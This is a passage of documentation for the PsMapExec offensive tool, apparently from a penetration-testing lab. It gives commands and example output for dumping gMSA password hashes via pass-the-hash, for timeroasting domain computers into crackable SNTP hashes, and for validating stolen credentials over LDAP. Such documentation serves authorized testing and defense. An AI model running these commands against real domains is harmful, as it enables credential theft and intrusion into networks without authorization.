PS > PsMapExec ldap -Targets MEEREEN -Username "BRAAVOS$" -Hash 216510998B7C442ED7A48362F067959F -Module GMSA

LDAP   192.168.56.12   MEEREEN   ESSOS.LOCAL   Windows Server 2016 Standard Evaluation     [+] SUCCESS

Authenticated to MEEREEN.ESSOS.LOCAL as ESSOS\BRAAVOS$

GMSA Account         : ESSOS.LOCAL\gmsaDragon$
Password valid until : 10/09/2025 14:54:59

rc4_hmac             : 85b952359bee0656b74f4259810f7cad
aes128_cts_hmac_sha1 : c985f4f4d9c2b033bbff1feb25b5aa22
aes256_cts_hmac_sha1 : 25430549f280401c239c175588c1f8e9b0cbd44e9496e4e0c54b9d03d18c5aca
des_cbc_md5          : efa47ab31ae0d92f

TimeRoast

Performs authenticated timeroasting. Output for this module will be written to $pwd\PME\TimeRoast

PsMapExec LDAP -Targets [Target] -Domain [Domain] -Module timeroast -ShowOutput

Example Output

PS > PsMapExec ldap -Targets DC01 -Module timeroast -ShowOutput

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

DC01:$sntp-ms$85ea8c46717179c44e2d4358d9fafef1$1c0111e900000000000a153a4c4f434cebd887...
WS01:$sntp-ms$f87f9cb07b5979b50193fa4614263103$1c0111e900000000000a153a4c4f434cebd887...
SECURITY-CA:$sntp-ms$75feee7f3fddb4a038737993000675f6$1c0111e900000000000a153a4c4f434...
WS-APPLOCKER:$sntp-ms$337efdb73a5e4f938d2a26302d8085de$1c0111e900000000000a153a4c4f43...
SRV2012:$sntp-ms$d8cd7853133544cfec03ffc87be5df98$1c0111e900000000000a153a4c4f434cebd...

Authentication & Validation

whoami

Validates the supplied credentials against the LDAP server and reports the identity it authenticated as.

PsMapExec LDAP -Targets [Target] -Domain [Domain] -Module whoami

Example Output

PS > PsMapExec LDAP -Targets all -Domain essos.local -Username khal.drogo -Password horse -Module whoami

LDAP   192.168.56.12   MEEREEN   ESSOS.LOCAL   Windows Server 2016 Standard Evaluation     [+] SUCCESS

 Authenticated as ESSOS\khal.drogo
